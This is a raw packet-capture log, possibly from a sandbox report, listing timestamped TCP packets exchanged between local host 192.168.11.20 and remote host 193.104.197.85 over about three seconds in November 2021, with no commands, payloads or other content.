                          Nov 25, 2021 11:28:18.402825117 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.403060913 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.403202057 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.403769016 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.403942108 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.461704969 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461771011 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461788893 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461806059 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461821079 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461837053 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461853027 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461869001 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461884975 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461899996 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461915970 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.461931944 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.462402105 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.462531090 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.462696075 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.464376926 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.464550972 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.464708090 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.464879036 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.520843029 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.520952940 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.520961046 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.520970106 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.520976067 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.520982027 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.520987988 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.520994902 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.521001101 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.521007061 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.521013021 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.521023989 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.521030903 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.521184921 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.521214008 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.521222115 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.521229029 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.521279097 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.521285057 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.521383047 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.522926092 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.523027897 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.523035049 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.523154020 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.523159981 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.523789883 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.525130033 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.525139093 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.525157928 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.525219917 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.525227070 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.525233030 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.525293112 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.525367975 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.525377035 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.525382996 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.525389910 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.525398016 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.525444984 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.525451899 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.525455952 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.525615931 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.525784969 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.551831007 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.552000046 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.552169085 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.572508097 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.572729111 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.572737932 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.572865009 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.572874069 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.572880983 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.652801991 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.652811050 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.652914047 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.652923107 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.652929068 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.652935028 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.652941942 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653050900 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653059959 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653065920 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653073072 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653079033 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653084993 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653090954 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653098106 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653107882 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.653121948 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653129101 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653135061 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653141022 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653146982 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653153896 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653156042 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:18.653165102 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.653172016 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.720134974 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.720247030 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.876338005 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:18.926112890 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.025938034 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.026177883 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.026195049 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.026245117 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.026429892 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.083468914 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.083585024 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.083592892 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.083600044 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.083606005 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.083677053 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.083786964 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.083796024 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.083801031 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.083998919 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.084011078 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.084014893 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.085495949 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.085593939 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.085624933 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.085733891 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.085794926 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.085849047 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.085856915 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.085964918 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.085972071 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.085979939 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.086014986 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.086138010 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.086147070 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.086153030 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.086158991 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.086165905 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.086286068 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.086294889 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.086427927 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.086440086 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.124377966 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.124653101 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.134394884 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.134649038 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.137765884 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.137892962 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.137902975 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.137908936 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.137916088 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.137922049 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.137928009 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.137933969 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.137947083 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.138144970 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.138284922 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.138294935 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.138453007 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.138520956 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.138528109 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.138534069 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.138540030 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.138639927 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.138647079 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.138716936 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.138886929 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.139059067 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.189629078 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.189923048 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.198626995 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198636055 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198642969 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198648930 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198654890 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198661089 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198667049 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198673010 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198678970 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198684931 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198690891 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.198857069 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.198993921 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.241766930 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.241919994 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.242111921 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.255878925 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.255991936 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.256000996 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.256006956 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.256012917 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.256019115 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.256025076 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.256151915 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.256198883 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.256206989 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.256314039 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.256325960 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.256330013 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.256458998 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.257124901 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.257226944 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.257283926 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.257343054 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.257452965 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.257653952 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.296603918 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.296827078 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.311091900 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.311224937 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.311232090 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.311356068 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.311364889 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.311371088 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.311377048 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.311383009 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.311388969 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.311558962 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.311700106 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.367568970 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.367753029 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.367762089 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.367876053 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.367902040 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.367965937 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.367973089 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.367979050 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.367985010 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.368046999 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.421272039 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.421371937 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.421494961 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.421619892 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.466357946 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.641884089 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.691627026 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.790733099 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.791121960 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.791136980 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.791189909 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.791392088 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.846457958 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.846467018 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.846558094 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.846642971 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.846673012 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.846681118 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.846688032 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.846811056 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.846841097 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.846848965 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.846856117 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.846981049 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.847121954 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.900854111 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.900862932 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.900965929 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.900974989 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.900980949 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.900986910 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.900994062 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.901081085 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.901096106 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.901283979 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.901297092 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.954099894 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.954108953 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.954221964 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.954231024 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.954237938 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.954310894 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.954452991 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.954478025 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.954619884 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:19.954626083 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:19.954989910 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.017962933 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.018074036 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.018081903 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.018089056 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.018176079 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.018204927 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.018215895 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.018223047 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.018373966 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.018513918 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.075520039 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.075529099 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.075634956 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.075644016 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.075649977 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.075655937 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.075663090 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.075665951 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.075671911 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.075865030 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.076006889 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.138161898 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.138170958 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.138272047 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.138281107 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.138287067 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.138293028 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.138298988 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.138304949 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.138436079 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.138578892 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.191020012 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.191279888 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.191420078 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.191674948 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.191740990 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.191881895 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.191998959 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.192013979 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.192116976 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.192125082 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.192131996 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.192137957 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.192274094 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.192442894 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.243170023 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.243179083 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.243504047 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.243534088 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.243544102 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.243693113 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.243855000 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.244003057 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.302177906 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.302418947 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.302447081 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.302603006 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.302612066 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.302726984 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.302742004 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.302752018 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.302931070 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:20.353720903 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.353930950 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.357597113 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.405730963 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.597500086 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:20.644536972 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:21.576072931 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:21.576252937 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:21.576297998 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:21.576350927 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:21.633631945 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:21.633903980 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:21.634016991 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:21.634080887 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:21.634114027 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:21.634145021 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:21.634202003 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:21.634368896 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:21.678175926 CET657749806193.104.197.85192.168.11.20
